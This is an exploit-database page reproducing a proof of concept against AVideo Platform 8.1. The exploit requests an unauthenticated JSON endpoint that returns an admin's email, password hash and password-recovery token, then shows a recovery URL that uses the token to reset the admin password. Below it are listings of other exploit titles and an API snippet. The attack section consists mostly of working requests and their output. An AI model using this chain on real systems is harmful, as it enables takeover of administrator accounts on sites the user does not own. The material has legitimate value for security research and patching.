Menu

Search for hundreds of thousands of exploits

"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)"

Author

Exploit author

"Ihsan Sencan"

Platform

Exploit platform

json

Release date

Exploit published date

2020-02-05

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Exploit Title: AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
# 
................
0	
id	92
user	"admin"
name	"Watch Later"
email	"[email protected]"
password	"bc79a173cc20f0897db1c5b004588db9"
created	"2019-05-16 21:42:42"
modified	"2019-05-16 21:42:42"
isAdmin	1
status	"watch_later"
photoURL	"videos/userPhoto/photo1.png"
lastLogin	"2020-02-03 08:11:08"
recoverPass	"0ce70c7b006c78552fee993adeaafadf"
................
#
# Password recovery can be done using recoverPass.
# http://localhost/[PATH]/recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf
#
Release DateTitleTypePlatformAuthor
2020-04-01"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)"localwindowsHodorsec
2020-04-01"DiskBoss 7.7.14 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-24"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-24"UliCMS 2020.1 - Persistent Cross-Site Scripting"webappsphpSunCSR
Release DateTitleTypePlatformAuthor
2020-02-05"AVideo Platform 8.1 - Information Disclosure (User Enumeration)"webappsjson"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)"webappsjson"Ihsan Sencan"
2020-02-05"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)"webappsjsonnxkennedy
2019-10-30"Ajenti 2.1.31 - Remote Code Exection (Metasploit)"webappsjson"Onur ER"
2019-09-25"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution"webappsjson"Semen Alexandrovich Lyhin"
2018-11-05"Royal TS/X - Information Disclosure"webappsjson"Jakub Palaczynski"
2018-04-09"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution"webappsjson"RedTeam Pentesting"
2018-01-21"Shopware 5.2.5/5.3 - Cross-Site Scripting"webappsjsonVulnerability-Lab
2017-08-28"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)"webappsjsonLiquidWorm
2017-08-28"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting"webappsjsonLiquidWorm
2017-07-24"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure"webappsjson"RedTeam Pentesting"
2017-07-24"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution"webappsjson"RedTeam Pentesting"
2017-07-18"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)"webappsjsonxort
2017-06-02"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection"webappsjson"Goran Tuzovic"
2017-03-06"Deluge Web UI 1.3.13 - Cross-Site Request Forgery"webappsjson"Kyle Neideck"
2016-06-28"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection"webappsjson"Matt Bush"
2016-02-23"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery"webappsjson"Julien Ahrens"
Release DateTitleTypePlatformAuthor
2020-02-07"QuickDate 1.3.2 - SQL Injection"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Cross Site Request Forgery (Add User)"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - Remote Code Execution"webappsphp"Ihsan Sencan"
2020-02-06"Online Job Portal 1.0 - 'user_email' SQL Injection"webappsphp"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)"webappsjson"Ihsan Sencan"
2020-02-05"AVideo Platform 8.1 - Information Disclosure (User Enumeration)"webappsjson"Ihsan Sencan"
2019-01-28"Mess Management System 1.0 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-28"Teameyo Project Management System 1.0 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-25"GreenCMS 2.x - Arbitrary File Download"webappsphp"Ihsan Sencan"
2019-01-25"GreenCMS 2.x - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"SimplePress CMS 1.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"Joomla! Component J-CruisePortal 6.0.4 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-24"Joomla! Component JHotelReservation 6.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vReview 1.9.11 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vBizz 1.0.7 - Remote Code Execution"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vWishlist 1.0.1 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vRestaurant 1.9.4 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component VMap 1.9.6 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vBizz 1.0.7 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-23"Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-22"Joomla! Component Easy Shop 1.2.3 - Local File Inclusion"webappsphp"Ihsan Sencan"
2019-01-21"PHP Dashboards NEW 5.8 - Local File Inclusion"webappsphp"Ihsan Sencan"
2019-01-21"Coman 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"PHP Dashboards NEW 5.8 - 'dashID' SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"PHP Uber-style GeoTracking 1.1 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"Kepler Wallpaper Script 1.1 - SQL Injection"webappsphp"Ihsan Sencan"
2019-01-21"Reservic 1.0 - 'id' SQL Injection"webappsphp"Ihsan Sencan"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48003/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse